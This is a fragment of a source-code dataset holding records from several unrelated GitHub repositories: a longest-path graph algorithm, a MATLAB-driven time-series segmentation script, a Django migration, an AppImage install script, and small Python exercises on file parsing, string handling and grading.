"text": "__author__ ='Sorour E.Amiri'\n\nimport networkx as nx\nimport sys\nimport operator\nimport multiprocessing as mp\n\n\ndef generate_test_input():\n graph = {}\n graph['Source'] = {}\n graph['a'] = {}\n graph['b'] = {}\n graph['c'] = {}\n graph['d'] = {}\n graph['e'] = {}\n graph['f'] = {}\n graph['Target'] = {}\n graph['Source']['a'] = 3\n graph['Source']['d'] = 2\n graph['Source']['f'] = 10\n graph['a']['b'] = 2\n graph['a']['e'] = 7\n graph['d']['c'] = 4\n graph['f']['Target'] = 9\n graph['b']['c'] = 5\n graph['e']['Target'] = 8\n graph['c']['Target'] = 6\n return graph, 'Source', 'Target', 4\n\n\ndef make_dag(graph):\n dag = nx.DiGraph()\n for key1 in graph.keys():\n for key2 in graph[key1].keys():\n dag.add_weighted_edges_from([(key1, key2, graph[key1][key2])])\n return dag\n\n\ndef main(graph, source, target, max_length):\n alp_list = []\n dag = make_dag(graph)\n tree = nx.DiGraph()\n tree_nodes = {}\n tree_levels = {}\n level = 0\n predecessor = 'null'\n weight = 0\n c = 2\n tree_levels[level] = [source]\n tree_nodes[source] = {}\n tree_nodes[source][level] = (predecessor, weight)\n tree.add_node((source, level))\n\n for level in range(max_length + 1):\n tree_levels[level + 1] = []\n for nodes in tree_levels[level]:\n pi, p_weight = tree_nodes[nodes][level]\n for successor in dag.successors(nodes):\n # edge_weight = dag[nodes][successor]['weight']\n # tree.add_weighted_edges_from(((nodes, level), (successor, level + 1), edge_weight))\n # weight = p_weight + dag.edge[nodes][successor]['weight']\n weight = p_weight + dag.succ[nodes][successor]['weight']\n try:\n curr_pi, curr_weight = tree_nodes[successor][level + 1]\n if curr_weight < weight:\n tree_nodes[successor][level + 1] = (nodes, weight)\n except KeyError:\n try:\n temp = tree_nodes[successor]\n except KeyError:\n tree_nodes[successor] = {}\n\n tree_nodes[successor][level + 1] = (nodes, weight)\n tree_levels[level + 1].append(successor)\n try:\n t_pi, t_weight = tree_nodes[target][level]\n alp_list.append(t_weight / float(level - c))\n except KeyError:\n alp_list.append(0)\n\n # alp_list = [lp_list[i] / float(i) for i in range(1, len(lp_list))]\n\n max_index, max_value = max(enumerate(alp_list), key=operator.itemgetter(1))\n\n # get the path\n # nx.all_simple_paths(tree, source=(source, 0), target=(target, max_index))\n pi, p_weight = tree_nodes[target][max_index]\n level = max_index - 1\n path = []\n while not level == 0:\n path.append(pi)\n pi, p_weight = tree_nodes[pi][level]\n level -= 1\n path.reverse()\n return path, max_value, max_index - c\n\n\nif __name__ == '__main__':\n graph = sys.argv[1]\n source = sys.argv[2]\n target = sys.argv[3]\n max_length = sys.argv[4]\n # graph, source, target, max_length = generate_test_input()\n path, path_weight, path_length = main(graph, source, target, max_length)\n print(path, path_weight, path_length)"
},
{
"alpha_fraction": 0.5163360834121704,
"alphanum_fraction": 0.5351822972297668,
"avg_line_length": 29.918575286865234,
"blob_id": "c10e3fb642a33ed27d1480ecd23da8d50cd0f400",
"content_id": "693b53a3d4f74eda115f416bc05286073ff4fd8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12151,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 393,
"path": "/dassa.py",
"repo_name": "SorourAmiri/DASSA",
"src_encoding": "UTF-8",
"text": "___author__='Sorour Ekhtiari Amiri & Liangzhe Chen'\n__email__='[email protected]'\n\nimport numpy as np\nimport math\nfrom collections import defaultdict\nimport sys\nimport os\nimport ALP as falp\nimport time\nimport subprocess\n\n\ndef aib(data_dir, MinW, N_mdl, CalcMode, _dir, matlab_path):\n matlab_function = \"AIB('\" + _dir + \"', '\" + data_dir + \"', '\" + str(MinW) + \"', '\" + str(N_mdl) + \"', '\" + \\\n str(CalcMode) + \"')\"\n subprocess.call([matlab_path, \"-nosplash\", \"-nodisplay\", \"-r\", matlab_function])\n\n\ndef toposort(graph):\n print('toposort...')\n \"\"\"http://code.activestate.com/recipes/578272-topological-sort/\n\n Dependencies are expressed as a dictionary whose keys are items\nand whose values are a set of dependent items. Output is a list of\nsets in topological order. The first set consists of items with no\ndependences, each subsequent set consists of items that depend upon\nitems in the preceeding sets.\n\n>>> print '\\\\n'.join(repr(sorted(x)) for x in toposort2({\n... 2: set([11]),\n... 9: set([11,8]),\n... 10: set([11,3]),\n... 11: set([7,5]),\n... 8: set([7,3]),\n... }) )\n[3, 5, 7]\n[8, 11]\n[2, 9, 10]\n\n\"\"\"\n from functools import reduce\n data = defaultdict(set)\n for x, y in graph.items():\n for z in y:\n data[z[0]].add(x)\n\n # Ignore self dependencies.\n for k, v in data.items():\n v.discard(k)\n # Find all items that don't depend on anything.\n extra_items_in_deps = reduce(set.union, data.values()) - set(data.keys())\n # Add empty dependences where needed\n data.update({item:set() for item in extra_items_in_deps})\n while True:\n ordered = set(item for item, dep in data.items() if not dep)\n if not ordered:\n break\n yield ordered\n data = {item: (dep - ordered)\n for item, dep in data.items()\n if item not in ordered}\n assert not data, \"Cyclic dependencies exist among these items:\\n%s\" % '\\n'.join(repr(x) for x in data.items())\n\n\ndef longestpathDAG(graph, startnode, endnode):\n print('longsetpath...')\n \"\"\"http://www.geeksforgeeks.org/find-longest-path-directed-acyclic-graph/\"\"\"\n ### TOPOLOGICALLY SORT THE VERTICES\n order = []\n for part in toposort(graph):\n order.extend(list(part))\n # order.reverse()\n\n ### INITIALIZE DISTANCE MATRIX\n LOWDIST=-99999999999999999\n dist = dict((x, LOWDIST) for x in graph.keys())\n dist[startnode] = 0\n\n ### MAIN PART\n comesfrom = dict()\n for node in order: # u\n for nbr, t1, t2, t3, nbrdist in graph[node]: # v\n if dist[nbr] < dist[node] + nbrdist :\n dist[nbr] = dist[node] + nbrdist\n comesfrom[nbr] = node\n\n ### BACKTRACKING FOR MAXPATH\n maxpath = [endnode]\n while maxpath[-1] != startnode:\n maxpath.append(comesfrom[maxpath[-1]])\n maxpath.reverse()\n Length = len(maxpath)\n return dist[endnode], maxpath[1:Length-1]\n\n\ndef Convert(ALP_arr, Y, dir_, FName):\n End = len(Y[0]) - 1\n F = dir_ + FName\n with open(F,'w')as f:\n # f.write('Segmentation :' + '\\n')\n # f.write(\"['Source',\")\n for i in ALP_arr:\n f.write(\"'\" + str(float(Y[int(i)][End - 1])) + '-' + str(float(Y[int(i)][End])) + \"'\" + ',')\n # f.write(\"'Target']\" + '\\n')\n f.close()\n\n\ndef Finding_Neigbours(YID, Y, node):\n Neigbours = []\n # YID.remove(node)\n End = len(Y[0]) -1\n E1 = Y[node][End]\n for item in YID:\n B2 = Y[item][End-1]\n if (E1 == B2):\n Neigbours.append(item)\n return Neigbours\n\n\ndef get_distance(node1, node2, P_Xtilde_Y):\n V1 = node1\n V2 = node2\n if len(P_Xtilde_Y) > 1:\n a = P_Xtilde_Y[:, V1]\n b = P_Xtilde_Y[:, V2]\n else:\n a = P_Xtilde_Y[0][V1]\n b = P_Xtilde_Y[0][V2]\n dist = 0\n for i in range(len(a)):\n dist = (a[i] - b[i])**2\n\n dist **= 0.5\n return dist\n\n\ndef Datapointnumber(End, Begin, Timestamp, EEnd):\n if End != EEnd:\n members = Timestamp[np.where((Timestamp >= Begin) & (Timestamp < End))]\n else:\n members = Timestamp[np.where((Timestamp >= Begin) & (Timestamp <= End))]\n number = len(members)\n return number\n\n\ndef get_quality(Distance, Min_n, Std, Mean, Total, method, fun, Frac):\n epsilon = 0.0001\n if method == 'Fraction':\n if fun == 'Sharp':\n if Min_n< (Frac* Total): #Mean - (2*Std):\n quality = min(Distance,epsilon)\n else:\n quality = Distance\n else:\n #print Min_n,Frac,Total\n try:\n quality = Distance / (1+math.exp(-Min_n+(Frac * Total)))\n except OverflowError:\n quality = 0.0\n else: # if method = 'Sigma':\n if fun == 'Sharp':\n if (Min_n< (Mean - (2*Std))): #:\n quality = min(Distance,epsilon)\n else:\n quality = Distance\n else:\n quality = (Distance / (1+math.exp(-Min_n+(Mean - (2*Std)))))\n return quality\n\n\ndef generate_graph(P_Xtilde_Y,Timestamp,Y,BeginTime,EndTime,method,fun,Frac):\n print('generate_graph...')\n G={}\n N_points_arr = {}\n End = len(Y[0])-1\n YID = range(0,len(Y))\n Source = 'Source' #len(Y)\n Target = 'Target' #len(Y) + 1\n G[Source] = []\n G[Target] = []\n TotalW = 0\n Totale = 0\n for node1 in YID:\n size1 = Y[node1][End]- Y[node1][End-1]\n number1 = Datapointnumber(Y[node1][End],Y[node1][End-1],Timestamp,EndTime)\n\n try:\n N_points_arr[size1].append(number1)\n except KeyError:\n N_points_arr[size1] = [number1]\n\n Neigbours = Finding_Neigbours(YID,Y,node1)\n ## Adding 2 extra nodes\n if (Y[node1][End] == EndTime) & (Y[node1][End-1] == BeginTime):\n continue\n if Y[node1][End] == EndTime:\n try:\n G[node1].append((Target,0,0,0,0))\n except KeyError:\n G[node1] = [(Target,0,0,0,0)]\n if Y[node1][End-1] == BeginTime:\n try:\n G[Source].append((node1,0,0,0,0))\n except KeyError:\n G[Source] = [(node1,0,0,0,0)]\n #################################################\n for node2 in Neigbours:\n size2 = Y[node2][End]- Y[node2][End-1]\n number2 = Datapointnumber(Y[node2][End],Y[node2][End-1],Timestamp,EndTime)\n\n\n if number1<=number2:\n Min_n = number1\n Min_s = size1\n else:\n Min_n = number2\n Min_s = size2\n Distance = get_distance(node1,node2,P_Xtilde_Y)\n quality = 0\n\n Weight = Distance\n TotalW += Weight\n Totale +=1\n try:\n G[node1].append((node2,Weight,Min_n,Min_s,quality))\n except KeyError:\n G[node1] = [(node2,Weight,Min_n,Min_s,quality)]\n Mean = {}\n Std = {}\n Graph = {}\n for Key in N_points_arr.keys():\n Mean[Key] = np.array(N_points_arr[Key]).mean()\n Std[Key] = np.array(N_points_arr[Key]).std()\n Total = Datapointnumber(EndTime,BeginTime,Timestamp,EndTime)\n for Key in G.keys():\n for i in range(0,len(G[Key])):\n node2,Weight,Min_n,Min_s,quality = G[Key][i]\n if Min_s> 0:\n quality = get_quality(Weight,Min_n,Std[Min_s],Mean[Min_s],Total,method,fun,Frac)\n G[Key][i] = (node2,Weight,Min_n,Min_s,quality)\n for Key in G.keys():\n for node2,Weight,Min_n,Min_s,quality in G[Key]:\n try:\n Graph[Key][node2] = quality\n except KeyError:\n Graph[Key] = {}\n Graph[Key][node2] = quality\n Graph['Target']={}\n return Graph,G,(float(TotalW)/Totale)\n\n\ndef Calc_Weights(G,maxpath):\n Weight = []\n for i in range(0,len(maxpath)-1):\n for (x,t1,t2,t3,y) in G[maxpath[i]]:\n if (x == maxpath[i+1]):\n Weight.append(y)\n return Weight\n\n\ndef ReadData(data_dir):\n print('ReadData')\n PFile = data_dir + 'P_Xtilde_Y.txt'\n P_Xtilde_Y = []\n with open(PFile) as f:\n Rows=f.read().splitlines()\n for row in Rows:\n #items=row.strip().split('\\t')\n items=row.strip().split()\n tmp = [float(item) for item in items]\n P_Xtilde_Y.append(tmp)\n P_Xtilde_Y = np.array(P_Xtilde_Y)\n f.close()\n FYtilde = data_dir + 'Ytilde.txt'\n Ytilde = []\n with open(FYtilde) as f:\n Rows=f.read().splitlines()\n for row in Rows:\n Ytilde.append(float(row))\n Ytilde = np.array(Ytilde)\n f.close()\n FXtilde = data_dir + 'Xtilde.txt'\n Xtilde = []\n with open(FXtilde) as f:\n Rows=f.read().splitlines()\n for row in Rows:\n Xtilde.append(float(row))\n f.close()\n FY = data_dir+'Y.txt'\n Y = []\n with open(FY) as f:\n Rows=f.read().splitlines()\n for row in Rows:\n items=row.strip().split('\\t')\n tmp = [float(item) for item in items]\n Y.append(tmp)\n f.close()\n FTime = data_dir + 'BeginEndTime.txt'\n with open(FTime) as f:\n Rows = f.read().splitlines()\n for row in Rows:\n items=row.strip().split('\\t')\n BeginTime = float(items[0])\n EndTime = float(items[1])\n f.close()\n\n FX = data_dir+'X.txt'\n X = []\n with open(FX) as f:\n Rows=f.read().splitlines()\n for row in Rows:\n items=row.strip().split('\\t')\n tmp = [float(item) for item in items]\n X.append(tmp)\n X = np.array(X)\n f.close()\n End = len(X[0])-1\n if len(X)>1:\n Timestamp=X[:,End]\n else:\n Timestamp = X[0][End]\n\n return P_Xtilde_Y,Ytilde,Xtilde,Y,Timestamp,BeginTime,EndTime\n\n\ndef main(data_dir, ff, MinW, N_mdl, CalcMode, _dir, matlab_path, PathMode):\n aib(data_dir, MinW, N_mdl, CalcMode, _dir, matlab_path)\n start = time.clock()\n print('start time recording')\n s_lz=time.time()\n P_Xtilde_Y,Ytilde,Xtilde,Y,Timestamp,BeginTime,EndTime = ReadData(data_dir)\n l = int((EndTime - BeginTime) / MinW + 3)\n G, G1, TotalAVG = generate_graph(P_Xtilde_Y, Timestamp, Y, BeginTime, EndTime, 'Fraction', 'Sigmoid', ff)\n dir_ = data_dir\n directory = os.path.dirname(dir_)\n if not os.path.exists(directory):\n os.makedirs(directory)\n if PathMode == 'ALP':\n sf = open(data_dir + 'ALP_runnimgtime.txt', 'w')\n start1 = time.clock()\n start2 = time.time()\n ALP_arr, avg, ALP_length = falp.main(G, 'Source', 'Target', l)\n end2 = time.time()\n end1 = time.clock()\n e_lz=time.time()\n\n sf.write(data_dir + '\\n')\n sf.write(str(e_lz-s_lz)+'\\n')\n sf.close()\n # print('fast alp cpu time: ' + str(end1 - start1))\n # print('fast alp time: ' + str(end2 - start2))\n # print('ALP_arr:' + str(ALP_arr))\n # print('avg: ' + str(avg))\n # print('ALP_length' + str(ALP_length))\n\n # FName = 'Segmentation.txt'\n # Name = 'ALP.txt'\n # CostName = 'ALP-AVG.txt'\n\n # elif PathMode == 'LP':\n # avg, ALP_arr = longestpathDAG(G1, 'Source', 'Target')\n # print str(ALP_arr)\n # FName = 'LP2.txt'\n # Name = 'LP.txt'\n # CostName = 'LP-AVG.txt'\n # avg = float(avg) / len(ALP_arr)\n\n FName = 'Segmentation.txt'\n Convert(ALP_arr, Y, dir_, FName)\n\n # with open(dir_ + Name, 'wb')as f:\n # for j in ALP_arr:\n # f.write(str(j) + '\\t')\n # with open(dir_ + CostName, 'wb') as g:\n # g.write('AVG of path: ' + str(avg) + '\\n')\n # g.write('Totla AVG: ' + str(TotalAVG))\n elapsed = (time.clock() - start)\n print (data_dir + ':' + str(elapsed))\n\n\nif __name__ == '__main__':\n data_dir = sys.argv[1] #'./data/test/' # Dirrectory of the data\n matlab_path = sys.argv[2] #'/Applications/MATLAB_R2016a.app/bin/matlab'\n data_dir += '/'\n data_dir = data_dir.replace('//', '/')\n _dir = data_dir + 'input.txt'\n ff = 0.001\n MinW = int(sys.argv[3]) #2*86400 #604800\n N_mdl = int(sys.argv[4]) #5\n CalcMode = int(sys.argv[5]) #0\n PathMode = 'ALP'\n main(data_dir, ff, MinW, N_mdl, CalcMode, _dir, matlab_path, PathMode)\n"
},
{
"alpha_fraction": 0.6431535482406616,
"alphanum_fraction": 0.6929460763931274,
"avg_line_length": 25.77777862548828,
"blob_id": "28abd6ede02de6a4c2caac829cc2d386792e9ef6",
"content_id": "d0a0c44d4dc3d51f851eb11c0680ef959e6f8df7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 241,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 9,
"path": "/makefile",
"repo_name": "SorourAmiri/DASSA",
"src_encoding": "UTF-8",
"text": "#Make sure you set a correct matlab path\nEXAMPLE = './data/test/'\nMATLAB_path = '/Applications/MATLAB_R2016a.app/bin/matlab'\nMinW = 172800\nN_mdl = 5\nCalcMode = 1\n\ndemo:\n\tpython dassa.py $(EXAMPLE) $(MATLAB_path) $(MinW) $(N_mdl) $(CalcMode)\n"
}
] | 4 |
w796933/openuds | https://github.com/w796933/openuds | 08d6e552f17757574f3756a4643e65f24cd1d1d4 | 41c94913f841c0f689b209f04437d8c0cb98c917 | fc0757fd49424d4873534341facae02f4c75b564 | refs/heads/master | 2023-05-30T03:40:17.027854 | 2021-06-11T10:02:26 | 2021-06-11T10:02:26 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5175879597663879,
"alphanum_fraction": 0.5929648280143738,
"avg_line_length": 22.41176414489746,
"blob_id": "1d5a996089eb38182b1baf4413e180ce39585ba4",
"content_id": "dec47f9debf325226cdf46ef9fa8f76039d64722",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 398,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 17,
"path": "/server/src/uds/migrations/0041_alter_statscounters_index_together.py",
"repo_name": "w796933/openuds",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.2 on 2021-05-12 13:00\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('uds', '0040_auto_20210422_1340'),\n ]\n\n operations = [\n migrations.AlterIndexTogether(\n name='statscounters',\n index_together={('owner_type', 'counter_type', 'stamp'), ('owner_type', 'stamp')},\n ),\n ]\n"
},
{
"alpha_fraction": 0.7329843044281006,
"alphanum_fraction": 0.7696335315704346,
"avg_line_length": 20.22222137451172,
"blob_id": "54c1f87900ad470f379a9421a860ad6d082b70ba",
"content_id": "da0ac64380340e6a811640f2102c2e0fe70b2da1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 191,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 9,
"path": "/client-py3/full/linux/installer-appimage-template.sh",
"repo_name": "w796933/openuds",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\necho \"Installing UDSClient...\"\n\ncp UDSClient-0.0.0-x86_64.AppImage /usr/bin\ncp UDSClient.desktop /usr/share/applications\nupdate-desktop-database\n\necho \"Installation process done.\"\n"
}
] | 2 |
yuvan03/sequence-processors | https://github.com/yuvan03/sequence-processors | 037dd071a691fbc19b9c1cc7b589609170e1902c | 05898f1185df177c4536151dbf0095e80dd9dd97 | 28f3bad4bc249f932ae94a519b74b1261370af20 | refs/heads/master | 2022-12-10T21:51:31.535761 | 2020-09-06T13:41:55 | 2020-09-06T13:41:55 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6362126469612122,
"alphanum_fraction": 0.6362126469612122,
"avg_line_length": 25.217391967773438,
"blob_id": "4c052d697d107abdf5070a069efe104a7d0369a6",
"content_id": "756ddcc0bce9aab78f58e1e3870490837a87f0a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 602,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 23,
"path": "/file_parser.py",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "import sys\nimport os\n\n\nclass FileParser():\n\n def __init__(self, filelocation):\n self.filelocation = filelocation\n input_data = self.read_file()\n print(\"File contents: {}\".format(input_data))\n\n def read_file(self):\n file_contents = \"\"\n with open(self.filelocation, \"r\") as f:\n file_contents=\"\".join(each_line.rstrip() for each_line in f)\n return file_contents\n\n\nif __name__ == '__main__':\n current_location = os.getcwd()\n print (\"Current working dir : %s\" % current_location)\n file_location = current_location+'/phrases.txt'\n FileParser(file_location)"
},
{
"alpha_fraction": 0.5308775901794434,
"alphanum_fraction": 0.5368363857269287,
"avg_line_length": 31.962963104248047,
"blob_id": "a988042224eb4cc750c35221f5ca5d372edb43e4",
"content_id": "3d4e71ad834533a512ff0070a50f5d027aca26bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1846,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 54,
"path": "/assign_grades.py",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "import os\n\nclass AssignGrades():\n \"\"\" User is given a grade and test report for items correct and incorrect.\"\"\"\n\n def __init__(self, file_location, subject):\n self.file_location = file_location\n if subject == 'chem':\n self.chem_assign_grades()\n\n def get_names(self):\n e_temp = []\n print(\"Please enter 5 elements from the first 20 in the periodic table\")\n while len(e_temp) < 5:\n elem = (input(\"Please enter element: \")).lower()\n if elem in e_temp:\n print (\"Duplicate entered\")\n elif len(elem) == 0:\n print(\"No value entered\")\n else:\n e_temp.append(elem)\n return e_temp\n\n def compute_grades(self, element_file):\n tmp_element_list = []\n element_list = element_file.readline()\n\n while element_list:\n tmp_element_list.append(element_list.strip().lower())\n element_list = element_file.readline()\n e_list = self.get_names()\n correct_list = []\n mistake_list = []\n for temp in range(5):\n if e_list[temp] in tmp_element_list:\n correct_list.append(e_list[temp])\n else:\n mistake_list.append(e_list[temp])\n \n correctpercent = (int(len(correct_list)))*20\n\n print (\"Score: \", correctpercent, \"%\")\n print (\"Found: \",correct_list)\n print(\"Not Found:\", mistake_list)\n\n def chem_assign_grades(self):\n element_file = open(self.file_location,'r')\n self.compute_grades(element_file)\n\n\nif __name__ == '__main__':\n current_location = os.getcwd()\n print (\"Current working dir : %s\" % current_location)\n AssignGrades(current_location+'/elements1_20.txt', 'chem')\n \n \n \n \n \n\n"
},
{
"alpha_fraction": 0.5841674208641052,
"alphanum_fraction": 0.5841674208641052,
"avg_line_length": 31.323530197143555,
"blob_id": "f2d6549326f3401e26c67b60ec5bce1036474ce4",
"content_id": "3963e48960dc7fbee814e3a6f2d36273fdc4aa45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1099,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 34,
"path": "/filter_sequence.py",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "from file_parser import FileParser\nimport os\n\nclass FilterSequence():\n\n def __init__(self, filelocation, filter_letter):\n self.filelocation = filelocation\n file_contents = FileParser(filelocation).read_file()\n print(\"File contents: {}\".format(file_contents))\n filtered = self.first_letter_filter(filter_letter, file_contents)\n print(filtered)\n\n def first_letter_filter(self, letter, phrase):\n \"\"\"Returns the words in [phrase] with starting letter after [letter]\"\"\"\n result, word = \"\", \"\"\n for letter in phrase: \n if letter.isalpha(): \n word += letter \n elif word.lower() > \"h\": \n result += word.upper() + \" \"\n word = \"\" \n else: \n word = \"\"\n if word.lower() > \"h\": \n result += word.upper()\n return result\n\n\nif __name__ == '__main__':\n current_location = os.getcwd()\n print (\"Current working dir : %s\" % current_location)\n filelocation = current_location+'/phrases.txt'\n filter_letter = 'G'\n FilterSequence(filelocation, filter_letter)\n"
},
{
"alpha_fraction": 0.6362500190734863,
"alphanum_fraction": 0.6499999761581421,
"avg_line_length": 25.700000762939453,
"blob_id": "740f81741e5c289a0346aee0590a59f755028613",
"content_id": "427fce4de01bfdbd716df946c481599b0247267d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 800,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 30,
"path": "/compute_weather.py",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "import os\n\n\nclass ComputeWeather():\n\n\tdef __init__(self, file_location):\n\t\tself.file_location = file_location\n\t\tself.get_avg_temp()\n\n\tdef get_avg_temp(self):\n\t\tavg_temps = open(self.file_location,'a+')\n\n\t\tavg_temps.write(\"Rio de Janeiro, Brazil, 30.0,18.0\\n\")\n\t\tavg_temps.seek(0)\n\t\theading = avg_temps.readline()\n\t\theadings = heading.split(',')\n\t\tcity_temp = avg_temps.readline()\n\t\tcity_list = city_temp.split(',')\n\t\twhile city_temp:\n\t\t print(headings[0].capitalize(), 'of', city_list[0], headings[2], 'is', city_list[2], 'Celsius')\n\t\t city_temp = avg_temps.readline()\n\t\t city_list = city_temp.split(',')\n\n\t\tavg_temps.close()\n\n\nif __name__ == '__main__':\n\tcurrent_location = os.getcwd()\n\tprint (\"Current working dir : %s\" % current_location)\n\tComputeWeather(current_location+'/avg_temp.txt')"
},
{
"alpha_fraction": 0.8294573426246643,
"alphanum_fraction": 0.8294573426246643,
"avg_line_length": 63.5,
"blob_id": "59ac6a20b3a46eb7f643ec27bdf7766954861962",
"content_id": "aaed60712563de98934966102fa9d0c3aeb53f0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 2,
"path": "/README.md",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "# Sequence Processing\nA collection of my experiments and learnings in Python, specifically in parsing files and processing data.\n"
},
{
"alpha_fraction": 0.5191029906272888,
"alphanum_fraction": 0.5265780687332153,
"avg_line_length": 30.657894134521484,
"blob_id": "a8a8de2b62533f880f5fee09d571427fff423060",
"content_id": "731cbba9b2da6ad78708658ffc71f1383656927e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1204,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 38,
"path": "/string_mixer.py",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "\n\nclass StringMixer():\n \"\"\" Takes string input and then prints out a mixed order version of the string\"\"\"\n \n def __init__(self, word_list):\n self.word_list = word_list\n self.mix_sentence()\n\n def mix_word(self, word_list):\n word_list.sort()\n new_words = []\n while len(word_list) > 5:\n new_words.append(word_list[-5])\n word_list.pop(-5)\n new_words.append(word_list[0])\n word_list.pop(0)\n new_words.append(word_list[-1])\n word_list.pop(-1)\n return new_words\n\n def mix_sentence(self):\n word_list = self.word_list\n word_length = len(word_list)\n for index in range(word_length):\n if len(word_list[index]) <= 3:\n word_list[index] = word_list[index].lower()\n elif len(word_list[index]) >=7:\n word_list[index] = word_list[index].upper()\n \n mixed = self.mix_word(word_list)\n\n for each_word in mixed:\n print(each_word, end=\" \")\n print()\n\nif __name__ == '__main__':\n word = input (\"Please enter poem/saying: \")\n word_list = word.split() \n StringMixer(word_list)"
},
{
"alpha_fraction": 0.6756756901741028,
"alphanum_fraction": 0.6763868927955627,
"avg_line_length": 30.75,
"blob_id": "ae6d663dfcb74dfdc8549f8e9c40a9f2f6063ac7",
"content_id": "7858d4c069ef3ab12fef60679ed3f5d9e372c34f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1406,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 44,
"path": "/check_string_list.py",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "\n\n\nclass CheckStringList():\n\n\t\"\"\"\n\tTakes string input and checks if that string is in a list of strings\n\n\tif string is in the list it removes the first instance from list\n\tif string is not in the list the input gets appended to the list\n\tif the string is empty then the last item is popped from the list\n\tif the list becomes empty the program ends\n\tif the user enters \"quit\" then the program ends\n\t\"\"\"\n\n\n\tdef __init__(self, entity_list):\n\t\tself.entity_list = entity_list\n\t\tself.get_user_choice()\n\n\tdef construct_entity_list(self, new_entity):\n\t\tif new_entity == \"\":\n\t\t\t entity = entity_list.pop()\n\t\t\t print(new_entity + \" has been popped from list\")\n\t\telif new_entity.lower() in entity_list:\n\t\t\t print(new_entity + \" has been removed from list\")\n\t\t\t return entity_list.remove(new_entity)\n\t\telse:\n\t\t\t print (\"1 instance of \" + new_entity + \" has been appended to the list\")\n\t\t\t return entity_list.append(new_entity)\n\n\tdef get_user_choice(self):\n\t\twhile self.entity_list:\n\t\t\tnew_entity = input(\"Please enter any entity name to add to list or press 'q' to quit program: \")\n\t\t\tif new_entity.lower() == \"q\":\n\t\t\t\tprint(\"Quitting program now\")\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"List of entitys: \" + str(entity_list))\n\t\t\t\tself.construct_entity_list(new_entity)\n\t\t\t\tprint (entity_list)\n\t\tprint (\"Goodbye!\")\n\n\nif __name__ == '__main__':\n\tentity_list = [\"rabbit\", \"lion\", \"dog\"]\n\tCheckStringList(entity_list)\n\t\t\t\t\t\n"
}
] | 7 |
SkyTruth/clustering | https://github.com/SkyTruth/clustering | 4694af1584ddf657e07a6b5ce2443302892ece04 | 574bb870b78fe13f74dee23a9345549f0c905f43 | 85245b2ae9398ea27d6251b94f8ea7238bf94f7e | refs/heads/master | 2018-12-29T17:21:05.280125 | 2014-10-06T11:57:21 | 2014-10-06T11:57:21 | 16,341,137 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.570694088935852,
"alphanum_fraction": 0.5835475325584412,
"avg_line_length": 32.826087951660156,
"blob_id": "65055cf4ddc6ede5e209b93e295d39ebb173bf00",
"content_id": "0cde07102cf4b807f6a057d3fb03567deb3fdea5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3890,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 115,
"path": "/dbcluster",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set fileencoding=utf-8 :\n# SETUPTOOLS_DO_NOT_WRAP\n\n# cluster rows.csv clusters.csv\n#\n# - Copyright (C) 2014 SkyTruth\n# Author: Egil Moeller <[email protected]>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\nimport numpy\nimport sklearn.cluster\nimport csv\nimport sys\nimport argparse\nimport math\n\ndef floatify(row):\n res = {}\n for key in row:\n try:\n res[key] = float(row[key])\n except ValueError:\n pass\n return res\n\ndef loaddata(filename, maxlines=None):\n lines = -1\n with open(filename) as f:\n for l in f:\n lines += 1\n if maxlines is 